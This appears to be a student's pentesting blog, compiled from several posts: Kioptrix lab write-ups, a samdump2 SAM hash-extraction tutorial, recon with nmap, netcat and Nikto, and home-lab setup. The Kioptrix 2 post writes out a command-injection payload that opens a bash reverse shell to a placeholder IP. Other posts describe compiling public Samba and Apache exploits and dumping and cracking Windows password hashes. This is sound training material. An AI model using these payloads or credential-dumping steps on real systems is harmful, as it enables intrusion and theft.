Kioptrix 2 – Lessons Learned

Rather than do a traditional walkthrough on most of these, I think I’ll just do a “lessons learned” type thing. That’s more useful for me, and honestly, the world doesn’t need another Kioptrix walkthrough.

So with the first one I feel like I was pretty much successful. I took a generic pentesting methodology, applied it using the specific tools I had, and it worked out well. With this one, things were a bit more tricky.

Mistake one: I didn’t use anything to enumerate web pages on the site. So I spun my wheels on the services detected through nmap for much longer than I should have, rather than just looking at the index.php page. One look and it becomes pretty clear that the entry point of this VM does not lie in analysis of tool feedback and research of vulnerabilities associated with software. A little SQL injection and you’re in, and you’re given a prompt that runs the ping command. I was able to set up a reverse shell and then we’re in the box as the apache user. This is where the research comes in and reveals a privilege escalation vulnerability for the Linux kernel.
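For my own notes, the injection-to-shell step was roughly along these lines; the IP and port are placeholders and this is from memory rather than a copy of the actual session:

nc -lvnp 443

127.0.0.1; bash -i >& /dev/tcp/192.168.1.50/443 0>&1

The first line is the listener on the attacking machine, the second is what gets submitted in the ping field on the web page.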

Mistake two: I missed the hardcoded credentials in the index.php source code. If the objective is just to own the box, well that’s not of too much consequence. But the objective here is really just to get as much info as possible and missing that bit of data is instructive for the future.

So far, my objective has been to stay away from Metasploit and see what I can do manually and it has been working out. These haven’t been challenging but there are inefficiencies and things I miss so I need to shore that up. I’m making a playbook for these machines and making some adjustments based on my results. Next up: Kioptrix 3.

Kioptrix 1 – First up

Diving in, my hope is to run through some of these Vulnhub instances and practice enumeration, exploitation (of course), and documentation. The goal is to begin the OSCP course in about a month, coinciding with graduation time. In the meantime I also want to develop some proto-scripts for enumeration, hence the focus on enumeration for me. And we’re starting with Kioptrix 1.

First off, netdiscover, match the MAC to the MAC in the ESXi settings, acquire IP

And then nmap. Keeping it simple, just an -sV.
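For reference, those first two steps are roughly this, with a placeholder network range and IP:

netdiscover -r 192.168.1.0/24

nmap -sV 192.168.1.104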

Got some services and right off the bat we have some candidates. But let’s flesh it out and do some nikto:

I followed this up with a bunch of nmap scans that I won’t bother posting pictures of. Basically, enumeration scripts, including http-enum and a few smb-enum-* scripts. None really gave much information.
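For the record, those follow-up scans were along these lines (the script list is representative, not exhaustive, and the IP is a placeholder):

nmap --script http-enum 192.168.1.104

nmap --script smb-enum-shares,smb-enum-users -p 139 192.168.1.104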

Nikto showed us a few directories and two accessible webpages, one the default Apache webpage and one a php page named test.php that doesn’t appear to do much. Looking at rpcbind, I checked out a suggestion found online to look for rpcinfo and check for mounts. No joy, but a worthwhile effort:
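The check itself is just a couple of commands (same placeholder IP):

rpcinfo -p 192.168.1.104

showmount -e 192.168.1.104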

After that we look at our candidates from the scans. First we have the Apache version. We also have OpenSSH, which we won’t really talk about since there does not seem to be a publicly available exploit for this version. Next we have port 139, which means netbios, which means Samba most likely. We’ll use enum4linux to pull some more info there:
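The command is about as simple as it gets; the -a flag runs all of the basic enumeration:

enum4linux -a 192.168.1.104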

It’s a lot of text, but if you dig in there you’ll find that we are dealing with Samba 2.2.1a. And exploit-db has a lot to say about our Samba version. I pulled the exploit from that link and compiled (gcc -o samba_sploit 10.c) and it ran without a hitch.

Apache is a little more intense. The code on exploit-db doesn’t compile as is. Luckily an industrious young hacker has provided steps for updating the code; however, you’ll find that it still won’t compile, complaining a lot about SSL2. Turns out you will need to install libssl1.0-dev as well (look in the comments), and then it compiled nicely.
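For my own notes, the build ended up looking roughly like this; the exact source file name and compile flags come from the comments on the updated code, so treat this as a sketch:

apt-get install libssl1.0-dev

gcc -o OpenFuck OpenFuck.c -lcrypto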

Running OpenFuck -h you get a long list of potential targets. Look for our Apache versions on the list (ignore the OS versions) and try them one by one. Process of elimination yields us this:

Nicely. Lessons learned: don’t give up if the exploit isn’t working; it took a while to find the answer on the Apache vuln here. Also, I wish I had done a better job documenting. My intent is to get to the point that I am doing it in the OSCP format so I’ll be ready. Next up: Kioptrix 2.


Updating the Home Lab

When I set my lab up my primary concern was keeping costs fairly low. My needs were not, and probably still are not, for a powerful system. Just a capable one, even if only barely so. The setup I had fit the bill. A 90 dollar expense through eBay and another 25 or so for RAM got me a machine with dual Xeons and 32 GB of RAM, and it got the job done.

Then I turned it on. And then this happened with the power:

So in the interest of global warming and the future of humanity, I came up with another solution. I ended up on the SuperMicro e200-8d, which has a single Xeon with six cores, and 64 GB of RAM. All that with only a 60 watt power supply. This was significantly more expensive, though. Approximately 800 for the server alone and another 400 for RAM. I have enough room to expand to 128 GB but couldn’t justify the expense quite yet, given my usage.

The SuperMicro server has an IPMI interface. The Dell server I had before did as well, but mine never worked and I was never motivated enough to troubleshoot it. The remote management is a really nice feature. I didn’t think ahead to benchmark the old server so I could compare, but there’s no need really. The SuperMicro is an incredible upgrade.
The only drawbacks, so far, are the cost and the RAM. According to the Internet, which is never wrong, this model has compatibility issues with RAM. Luckily, SuperMicro provides a list of RAM models verified to work. Unfortunately, these are all quite expensive. This took the total price up close to 1300 dollars. If I needed the full 128 GB, it would have been 1800. That’s a lot of pressure to make the purchase worthwhile, which is good in a way. Still, one of my primary concerns was keeping the lab as cheap as possible and this has hosed that goal completely.

Projects so far: all-purpose Ubuntu server which serves as an OpenVPN server and whatever other junk I want to throw on it (twitter bots, etc), pentesting lab, Metasploitable 3.

Projects in the works: build my own AD forest, hook up some automation, enhanced pentesting lab, solve world hunger.

Here’s the new server sitting on top of the old one:

Using samdump2

In Penetration Testing, Weidman walks you through pulling hashes from the Security Account Manager (SAM) database on a Windows machine. SysKey is the Microsoft utility that encrypts the SAM database. SysKey uses the bootkey for encryption, which is actually an amalgamation of four separate keys contained in hidden fields within the registry. Luckily there are some tools that do the hard work of extracting the key for us.

In the text, bkhive is used to extract the key and then samdump2 is used to decrypt the SAM database and reveal the password hashes. The hashes must then be cracked using John the Ripper or another similar hash cracking tool.

When walking through the scenario in the text, there are a few issues. First, bkhive is no longer pre-installed on Kali. It isn’t necessary for it to be installed, as samdump2 can perform both functions, but the syntax is not readily apparent and searching on the Internet yields a lot of outdated information on using bkhive in conjunction with samdump2. Previously, bkhive would be the tool that extracted the key from the SYSTEM hive, and samdump2 would take that key and decrypt the SAM file. This gives you the password hashes and associated accounts for the machine. There are two solutions to get this working again: install older versions of the bkhive and samdump2 software and use those, or use samdump2 for both functions.

First, we’ll install the old versions. This is a bad way to do things, but doing this will allow you to follow the example in the text as written. This took longer to figure out than I care to admit.

The Kali repositories have bkhive available; however, installing from the repo does not give you a usable application, instead building out directories in /usr/share and placing documentation in those. Older versions of the software are maintained online and can be downloaded:

wget http://http.us.debian.org/debian/pool/main/b/bkhive/bkhive_1.1.1-1_amd64.deb

apt-get install libssl-dev

dpkg -i bkhive_1.1.1-1_amd64.deb

Now you have a version of bkhive that will work with the steps and syntax in the text. But the installed version of samdump2 still won’t accept the key as input; it is looking for the SYSTEM hive instead.

So to roll back the version of samdump2, first we have to install libssl1.0.0:

wget http://security.debian.org/debian-security/pool/updates/main/o/openssl/libssl1.0.0_1.0.1t-1+deb8u5_amd64.deb

dpkg -i libssl1.0.0_1.0.1t-1+deb8u5_amd64.deb

Now install the old version of samdump2:

wget http://http.us.debian.org/debian/pool/main/s/samdump2/samdump2_1.1.1-1.1_amd64.deb

dpkg -i samdump2_1.1.1-1.1_amd64.deb

And now we follow the example in the text:
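The old-style two-step ends up looking roughly like this, assuming the SYSTEM and SAM hives have already been copied into the working directory:

bkhive SYSTEM bootkey

samdump2 SAM bootkey > hashes.txt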

The simpler, and definitely preferable, alternative is just to use samdump2 for both key extraction and for pulling the hashes out of the SAM database. The syntax is pretty simple:

samdump2 SYSTEM SAM > hashes.txt

This command takes the location of the key to be extracted and the location of the SAM database, performs the extraction, decrypts the SAM database, and then outputs the results to hashes.txt. There are options for debugging if needed, available in the command help. Simple enough! Now using either method you have hashes ready to be cracked.
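If you want to take the hashes the rest of the way, a minimal John the Ripper run looks something like this; the wordlist path is just where Kali keeps rockyou, so adjust as needed:

john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt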

Moar Recon: Netcat and Web Vulnerabilities

I wanted to add a little more detail to what I’m doing with reconnaissance, but I want to be careful not to just copy the stuff in the book. I don’t think that adds anything of value when trying to learn, plus I don’t think anyone would appreciate me uploading their book to the internet one chapter at a time.

So to take it a little further and focus more on OSCP objectives, as I’ve understood them from my research, we want to do as much of this enumeration as we can without tools like Nessus. The first thing to try is running nmap scripts. Nmap comes with a ton of scripts loaded that can check for vulnerabilities, perform exploits, detect service versions, plus a ton of other things. For my purposes I’m only running the default scripts, just to get an idea of what they do.

nse1

We get a ton of information here. From the top, we see FTP. It has run a script, tested anonymous logon, and found it open. We can dig just a little deeper and see if we can find anything else with netcat:

nc-ftp1
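The connection itself is nothing fancy; the IP here is just a placeholder for the target:

nc 192.168.1.110 21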

Netcat displays the version and would allow us to log in. We can do a search and find that there don’t seem to be any exploits associated with this particular version of FileZilla. Moving on, we see that SMTP was listed along with a list of available commands. From here we can attempt to verify any possible account names we may think we have. The nmap scan shows us that ports 80 and 443 are hosting websites via XAMPP 1.7.2. We can verify this pretty easily:

xampp1

We can use netcat again to connect and find out a little more information about the server. What kind of web server is it running? What supporting services?

nc-http1

This is my first time really using netcat operationally; I’m familiar with the functionality and syntax but now we’re in it. As you see above, I get what appears to be an error, but we still get the information we were looking for. The server is running Apache 2.2.12, WebDAV 2 is running, which we know from the text should be examined for default credentials, and php 5.3 is running.
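For reference, the request I’m sending looks roughly like this; the IP is a placeholder and the headers have to be finished with a blank line (hit Enter twice):

nc 192.168.1.110 80
HEAD / HTTP/1.1
Host: 192.168.1.110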

I tried to dig more into the error and decided to fire up Aule (vulnerable Ubuntu machine that is designed for use with the book) and try that. So the website works:

aule1

And we try netcat:

nc-aule-http1

And we get a similar error, but again we get the header information we were looking for. This needs more testing; right now every server I have with a website gives back the “bad request” error, but it isn’t the end of the world since I get the header info and that is my objective right now.

One of the things the book points out about Lorien is that it is running phpmyadmin, because it comes in XAMPP. Since it is there in black and white, we know to check it. But how could we use a tool to find this out if it were not in the book? Using Nikto we can scan Lorien to see more information about available web interfaces:

nikto-lorien1
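The command itself is simple, something like this with a placeholder IP; the second form writes straight to a file for the longer runs:

nikto -h 192.168.1.110

nikto -h 192.168.1.110 -output nikto-lorien.txt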

I ran it this way to just get an idea of the output. For Lorien I got a lot of output and it was easier to pipe the Nikto results into a text file and go through it that way. Nikto enumerates each available directory and we can look at the web pages associated with those. Like the /server-status page:

lorien-site-enum1

The server information we have here matches up with the results of the Nikto scan, the netcat results, the nmap scan, the Nessus scan, and the OpenVAS scan. Which is cheating, since Nessus and OpenVAS actually use nmap. But still important to note the different ways to get needed info.

Further down the directory list we see /server-info:

lorien-site-enum4

Again, we see the server info. But there is much more. We have the root directory right there, which if we didn’t already know would help us with directory traversal. We have the location of various configuration files. Hey, let’s look at mod_alias.c, the Apache file that maps URL requests to aliases (among other things):

lorien-site-enum5

We see several accessible directories and can try each one. Hey look, it’s phpmyadmin:

lorien-site-enum2

We can look at this service and determine vulnerabilities, but the page is helpful as well:

lorien-site-enum3

Oh my…

There are some other issues to identify here from the book, but I’m more concerned with how to get the info on my own, using tools I know, rather than just reading the vulnerability info from the book. We have enough information now to move forward. One thing I do want to investigate is credentials. From the book we know that WebDAV is running here with default credentials; however, I need to identify the best way to discover that using available tools.

This is finals/project presentation time at school so I have no idea when I will get a chance to move forward with my lab. At least a week I am thinking.

Reconnaissance: Do it

We perform reconnaissance in order to learn about the environment. This is a pretty simple concept, but important to keep in mind. Yes, you’re running nmap, but why are you running it? To identify system attributes. Why? Each action must be considered in context of the ultimate goal. The ultimate goal in our case is access to data on a target machine. How do we get there? Let’s break it down.

We do scans in order to identify attack surface and possible vulnerabilities. Easy enough, but important to consider when planning. Each tool may have strengths and weaknesses, but understanding what the tool is telling you is more important.

In my lab, keep these names in mind: Morgoth is our attacker (Kali rolling release, whatever they’re up to), Lorien is an XP machine running SP2, and Ulmo is a Win7 machine running SP1 with no updates.

To suit up, first off we need to add a couple of things to Morgoth. Kali comes with a ton of tools but I want a couple non-standard ones just to have a comparison. Nmap is great and I know Nessus well, but if we’re going to do this I want to see what results look like from multiple sources and compare, then try and figure out why they might give different results. So I chose to install Angry IP Scanner and OpenVAS. Neither of these are tools I have any experience with, but they give that alternative comparison.

Installing ipscan is simple: we open a browser on Morgoth, navigate to http://angryip.org/download/, and download the .deb file. Open a terminal and install:

sudo dpkg -i ipscan_(versionnum)_(cpu).deb

Easy. Now to install OpenVAS, the Open Security folks have kindly packaged it up and put it in the Kali repo. So simply run:

sudo apt-get install openvas

And there we go. At this point, I ran out of space on my hard drive and had to take a brief detour. So it goes. As a reminder, make sure the basics of your system are good, or at least take a snapshot of your VM so you don’t end up like me, spending a day rebuilding. After downloading and installing OpenVAS, run the initial setup script:

sudo openvas-setup

This will set up the OpenVAS database and download plugins. It takes a bit of time. Once it is done, it will give you the admin password. Navigate to the web console at 127.0.0.1:9392 and log into the console with admin as the username and the password generated during setup. It’s now ready to scan.

First we start off with nmap. I’m sticking with results on Lorien just to save time. Results are being recorded in KeepNote, an open source note-taking tool included in the Kali build. I’m not going to waste time going through every option with nmap; for the purposes of this test I ran SYN, UDP, and version scans. The SYN scan results are below:

nmap1
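For reference, the three scans were along these lines, with a placeholder IP for Lorien:

nmap -sS 192.168.1.110

nmap -sU 192.168.1.110

nmap -sV 192.168.1.110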

We should run ipscan at this point to compare the results. Type in ipscan at the command prompt to launch the ipscan interface. The tool is pretty intuitive: you input the IP of the target and run it. You do need to expand the port range if you are looking to do a port scan. Below is an example of a port scan with Angry IP Scanner:

ipscan

The takeaway when comparing results between these tools is that they seem to be geared at different purposes. Angry IP Scanner is much quicker than nmap, especially on multiple targets. Nmap can provide more detailed information in a more easily exploitable format, so I think your choice really boils down to your goals. In each case ask the question: what is the tool telling me? We are seeing externally available IP and port information for the target system. This points to services the system is running, attackable surface. Knowledge of vulnerabilities in those services can come through independent research, or from a vulnerability scanner.

OpenVAS and Nessus provide very similar results. Here are the Nessus results:

nessus1

And the OpenVAS results:

openvas1

The results are similar, but there are some differences. OpenVAS was apparently forked from Nessus back when it was open source, so there are bound to be similarities. Nessus has the familiar plugins with easy to remember plugin numbers; OpenVAS has Network Vulnerability Tests (NVTs) listed by a complicated OID. The default report in OpenVAS lists findings by CVSS score and provides some context that Nessus doesn’t, for instance listing Lorien as running on an outdated OS. That’s a simple finding that is readily apparent from the Nessus results, but the distinctions are important. It is worth running both tools to see what, if any, differences come up. Nessus Home edition is not nearly as intuitive and easy to use as the Enterprise edition; learning to use the API may help with that.

Now we’re at the point with the lab where we have identified services and vulnerabilities. Moving forward, I have a list of projects now. I plan on doing the next chapter, which I am fairly excited about for its focus on ARP/DNS poisoning. I am also interested in recreating the Poisontap device. It does not look like I will make my December 1st deadline for wrapping this book up, but I think there is value in trying to take the lessons a bit further and learn something.

BSides DC was Awesome

BSides DC came and went. It was a great time. The training was great, the talks were great, everything was just great. To me, it seemed like the theme of the talks this year, if there was one, was risk management. Although I don’t think that was intentional.

I volunteered this year, and it was gratifying. I got to help out, meet people, and get some insight into exactly what it takes to put one of these conventions on. There were a couple of talks that I thought were just terrific, but volunteering was probably the highlight.

Liam Randall’s Bro class is pretty well known, so I knew that going to that would be a great opportunity. And it was; it served as an excellent primer on what Bro is, what it can do, and how you can implement it in your environment. My takeaway was definitely that we need Bro and this is something I want to learn. There’s a huge community surrounding Bro (being open source, that seems to happen) and a lot of material to dig into.

The vulnerability management talks, specifically, were inspirational to me. Gordon McKay’s talk about missing context in vulnerability management platforms was great, and the guys from Breakpoint Labs did a talk about how to take the next step after you do automated testing (not posted to Youtube yet). The first talk, to me, was great because it was something I hadn’t thought of but made sense immediately. The second because it validates everything I’m doing right now.

BSidesNoVA is coming up; I’ve already registered for that and a malware analysis class there as well. But it is only a two hour class so I volunteered for that event too. I’ll definitely volunteer for BSides Charm. And tickets to Shmoocon go on sale in a couple of days. Lots of stuff going on. I’ve given myself until December 1st to complete the book I’m working through and move on to the next phase. Which is plenty of time, really, but I am behind. If it weren’t for school I would be much further along, but oh well, it all pays off in the end.

tumblr_o2np7u8my81tqg1b5o1_500

Effective Threat Intelligence – A Book Review

Buzz words always annoy me, both their use and the lack of thought that people put into them. To me, “threat intel” has always been one of those things. “You need to integrate a threat intelligence platform into your risk mitigation plan.” ← actual words that were said to me once. That sounds like just meaningless wharglbhargl.

But someone recommended this book, entitled Effective Threat Intelligence by James Dietle, and it was on sale on Amazon and I thought “what the heck.” Turns out, it is a good read. A nice primer.

51i9fedpskl

If I had to sum the book up it would be this: you’re already doing threat intelligence. Reading your twitter feed, blogs, news sites, or even the curated lists and products provided by vendors. Everyone is doing this to some degree. There are two main concerns when thinking about threat intelligence: is what you are doing effective and is it customized to your specific environment?

Beyond the hype, the idea of threat intelligence is pretty integral to the security of a given environment. Analysts are always harping on the necessity of knowing your environment; that means understanding what is a threat and what is not. Both of these data points can be useful. Once the possible threats are understood to some degree, it becomes possible to customize the threat intelligence you are already getting to the environment.

All of this is obvious, and yet not being done in many cases. Vulnerability management is done by severity rather than risk management with a proper threat analysis backing that up. Did you patch all the purples? Maybe the reds? Then you won. But if you are doing your “threat intelligence” well, you know that isn’t the truth. The news and twitters and <insert source> are full of examples of organizations failing to properly analyze their environments and, even in a relatively robust VM program, paying for it.

The book is only a primer; it doesn’t get deep on any particular topic. I do like that it addresses team dynamics and incident response to some degree, and that it looks at the human factor behind a lot of the issues. It is a short book, but a good jumping off point to many more specific books on the subject, and I really like that. There are a thousand different ways a person could go after reading this book and then wanting to know more.

I’m glad I read that, but now school has started and I’m starting a new job so no more luxury reading for me. 3 classes to go then I am done with college. My big data/systems engineering course seems like a mountain of information. And my other course is… incident response/threat intelligence! Still working on the lab and coding and side projects, as always, but that work is going to slow way down with the school load creeping in.

Also, I’m volunteering for B-Sides DC and coming up with new ideas for talks at NOVAHackers. I plan on giving a talk there in October, depending on whether my idea pans out and is interesting. I’ve had a dozen ideas, but the one I think I am going with is breaking down Hackerboxes: seeing if I can work through them with my daughter and whether they are a good value compared to buying the parts separately at Amazon or Microcenter or something. We shall see. Also at B-Sides DC, a full day class on Bro. I hope to have some time to spend on that beforehand so I can really get the most out of the class when I go.

So much going on, it is hard to keep my goals in mind. It’s a challenge to be sure.

Even Moar Pentest Lab: Installing VMWare 6.0

So after setting up the NAS yesterday, my goal for today was to get back into python. As an update on that, my python is coming along: I finished Python Crash Course and am most of the way through Automate the Boring Stuff with Python. I’ve been through the first 4 chapters of Penetration Testing, and have learned a lot of cool stuff.

first_shell_zomg

This summer has been very productive for me, all things considered. But it is drawing to an end, sadly, and with school starting up this week I’ll have less time for my side projects. So I should have been pressing ahead with working the python projects from the books or working the pentesting chapters… but instead ADD won the day and I am finishing out building my lab.

I installed ESXi to run from a USB on my Dell Poweredge 1950, after upgrading it to 32 GB of RAM, which is more than enough for my purposes. Right now I’m just running the pentest lab, which should only consist of a few machines at any given time, but I have other projects in mind down the line that this will be useful for.

The installation was painless. Download the software, available for a free trial from VMWare, or get it licensed from another source. I am still with George Mason University, so we have a deal where we get licensed VMWare products for free. The download, at least in my case, comes with two files. One is a .iso file that contains the server installation files. The other is the management client for Windows.

Burn the .iso file to disc. It could also be burned to a USB if you aren’t from the ancient past, but I went with the disc because I am a wasteful American, and because I wasn’t sure how the server would react to loading the software from USB to USB, similar to the NAS4Free install. It probably would work fine, though. Insert the “destination” USB into the back of the server. Power the server on, insert the disc, navigate to the boot menu, and boot from disc. The installation to USB is quite easy: follow the prompts and, when instructed, remove the disc and reboot.

Upon reboot, bring up the BIOS menu and set the boot order. This will differ from server to server. On my server, the rear USB interface is treated as a hard drive for boot order purposes, and the individual hard drives can be sorted for boot order, so I set the USB drive as the main “hard drive” for boot and set the boot priority for hard drive to 1.

Once the server comes up, navigate in a web browser to the listed IP (assuming you have DHCP configured and the server was automagically assigned an IP, if not….). If the webpage for ESXi displays, then you’ve won. You can download the vSphere client from the link on the webpage or use the file from the initial software download. Install this software on your Windows client, following the default prompts. Once installed, start the software and navigate to the server’s IP. Authenticate using the username root and the password you set up during installation.

Open the NAS management console; in this case I used NAS4Free, of course. Navigate to the Services>NFS menu. First head to the Shares tab and input the name of the share and the network to which the share should be accessible. Then select Save and Apply Changes. Remember that every time you do anything with NAS4Free, you have to select Apply Changes.

create_nfs

Once complete, navigate back to the Settings tab. Ensure that Enable is selected. I chose to enable NFSv4; I don’t know what the difference is really, beyond what was immediately available on Wikipedia, so that’s a problem for future me. But it seems like the smart move. Select Save and Restart to bring the share up. You have to repeat this step and the previous one for each disk to be shared.

restart_nfs

Back in vSphere, navigate to the Inventory tab. You should see a prompt to create a data store; if not, go to the Configuration tab. Select Add Storage, then select NFS Store, and then Next.

mount_nfs

On the next window, input the IP of the NAS server and the path, not the name, of the share you are adding. Give it a unique name and hit Next.

mount_nfs2

Repeat this process for each disk you have to mount on the NAS. Once completed, you should see each disk attached to VMWare within vSphere.

nfs_success
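As an aside, I believe the same mount can be made from the ESXi command line over SSH with esxcli; the host, export path, and datastore name below are just placeholders matching my setup:

esxcli storage nfs add -H 192.168.1.250 -s /mnt/mount_1 -v nas_mount_1

esxcli storage nfs list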

Since I had already created several VMs on my laptop, in order to get them onto the datastore I will have to export them from VMWare Workstation and then import them into vSphere. To export the VMs, in VMWare Workstation select the VM to be exported and then go to File>Export to OVF. In vSphere, go to File>Deploy OVF Template and select the template in order to import the VM into vSphere.

ovf_deploy

Once imported, navigate to the system in vSphere and console in to change the IP and hostname, if necessary. Pretty easy stuff, minimal surprises or roadblocks. This is basically an enterprise deployment of VMWare, minus the STIGing and other concerns. Which will come in a future update I am sure!

Moar Pentesting Lab – Setting up a NAS

First off, errata from the last post. Working through the Weidman book, the copy of Windows XP SP 3 I listed doesn’t work for the exploits listed in the book and the security updates applied can’t be uninstalled. Windows XP SP2 does work, however I have yet to find a good, clean source for this.

Time to move on and set up the home NAS that will support my VMWare infrastructure. I decided on NAS4Free, since FreeNAS no longer supports x86 systems and my intent is to repurpose an old 32 bit system to support this. This isn’t necessarily the “right” or “best” way to do this, but it is what it is. And it works, very well. We’re doing an embedded USB install here, for ease of use and (hopefully, we’ll see) updating.

Use Win32 Disk Imager, located here, to place the NAS4Free image onto a USB. The image depends on the type of system; I’m using an old 32 bit system, so I picked the 32 bit image for version 10.3.0.3. Pick the appropriate image from here and download that. Using the tool to load the image is pretty painless.

Once that is complete, set the system to boot from USB in the BIOS settings and reboot, with your USB attached. Connect a second USB stick to the system. Once the system completes booting, select the first option in order to create an embedded USB install. The system will then prompt you to select a “source” disk; you should pick the USB with the image loaded onto it. The system will then prompt you for a “destination” disk; select the second USB drive. The install will then complete and the server will become available on 192.168.1.250 on your local network. This can be changed from the console if needed.

From a desktop, navigate in a web browser to http://192.168.1.250 and login using the username admin and the password nas4free. Once logged in you can change these values in the System>General menu. Navigate to the Disks>Management menu.

In order to manage the disks, they must first be imported. This walkthrough assumes the disks have no data on them. Select Import Disks under the HDD Management tab. Once completed, switch to the HDD Format tab. It defaults to ZFS Storage Pool, but since ZFS is incompatible with Windows I switched this to UFS. Select UFS, select all disks, and select Next to continue to the next menu. The Minimum Free Space setting defaults to 8%; leave that at the default and input a volume name. Select Next again and begin the formatting process. Once that is complete, it is time to mount the drives.

import

There is an option to create a RAID; after some deliberation I decided against it. RAIDs are really useful for fault tolerance, which isn’t a requirement in my home lab. If you aren’t running real-time backups suited for a home network (e.g. CrashPlan, Carbonite, a custom solution, etc) then this may be a consideration.

Navigate to the Services>CIFS/SMB menu. Select the Shares tab and create shares for each disk, using a custom name for each. Once complete, navigate back to the Settings tab and ensure that Enable is selected under CIFS (it is on the right side). Once this is complete, save and restart. The shares will not be accessible until you select Save and Restart.

nocomment

Once this is complete, map the drives under Windows and they should be accessible. Map them by name; for example, \\192.168.1.250\mount_1 from my example picture would map the first disk. Step 1 was setting up the VMs. Step 2, make a NAS, is complete. Now to get the ESXi server up…
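From the Windows side, that mapping can be done in the GUI or from a command prompt; the drive letter and share name here are just from my example:

net use Z: \\192.168.1.250\mount_1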